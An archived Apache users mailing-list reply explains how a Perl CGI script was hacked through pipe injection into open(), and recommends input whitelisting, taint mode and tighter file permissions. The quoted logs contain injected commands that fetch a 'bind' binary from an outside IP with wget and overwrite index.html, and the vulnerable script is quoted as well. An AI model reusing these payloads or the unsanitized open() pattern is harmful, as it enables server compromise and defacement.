httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Scott Gifford <sgiff...@suspectclass.com>
Subject Re: [users@httpd] Security Problem
Date Sun, 05 Dec 2004 21:44:56 GMT
Murthy Ambaru <bobby106@yahoo.com> writes:

[...]

> /images/newswireprint.gif HTTP/1.0" 304 -
> "http://www.xyz.org/cgi-bin/xyz.cgi?file=/2004/0722-0
> 8.htm|wget%20http://64.58.72.242/bind%20-O/tmp/bind|" "Mozilla/4.0
>
> GET /cgi-bin/xyz.cgi?file=|echo%20innocent%20boys...%20%3E%20/data/httpd/v
> hosts/xyz.org/httpdocs/index.html|
>
> Can anyone understand how are they able to hack? 

[...]

> #!/usr/local/bin/perl
>
> print "Content-type: text/html\n\n";
>
> &parseForm;
>
> open(HEADER,"printheader.html") ;
> my @HEADER = <HEADER>;
> close(HEADER);
> #print it! Put a # before print if you don't want a header printed...
> print "@HEADER";
>
> my $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file}";
>
> if (!open(FILE,"$data_file")) { die "Can't open";}

This is a Perl question really; you should try asking on a Perl
mailing list/newsgroup or on PerlMonks.org, where you'd get a much
more complete answer from lots of experts.  I'll be happy to do my
best, though.

The essential problem is that Perl's open command will execute a
command if the name of the file it's opening ends with a pipe, so you
can do something like:

    open(LS,"ls |");

to read the output of ls.  In this case, it's trying to open:

    /data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$FORM{file} |echo innocent boys... >
/data/httpd/vhosts/xyz.org/httpdocs/index.html |

which ends up running:

    echo innocent boys... > /data/httpd/vhosts/xyz.org/httpdocs/index.html

which is how the page got hacked.

The solution is to disallow any characters besides letters and numbers
from the filename when you're accepting it, with something like:

    if ($FORM{file} =~ /^([\w.]+)$/)
    {
       $data_file = "/data/httpd/vhosts/xyz.org/httpdocs/scriptfiles/$1";
    }
    else
    {
      die "Illegal characters in data file";
    }

You should really run your script in taint mode, by starting it with:

    #!/usr/local/bin/perl -T

That will make these sorts of things into runtime errors instead of
security issues, and will force you to fix similar problems in your
program.

Also, you should avoid having permissions set up such that CGI scripts
are allowed to overwrite your Web pages.  That would have prevented
this, although there are a host of other security problems it wouldn't
make a difference for.

You may want to read up on this topic, with something like:

    http://cvs.sourceforge.net/viewcvs.py/*checkout*/brian-d-foy/CGI_MetaFAQ/CGI_MetaFAQ.html?rev=HEAD&content-type=text/html#security

It's important to have a good understanding of security if you plan on
writing or taking responsibility for any sort of program that
interacts with the outside world, like a CGI script.

----ScottG.

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message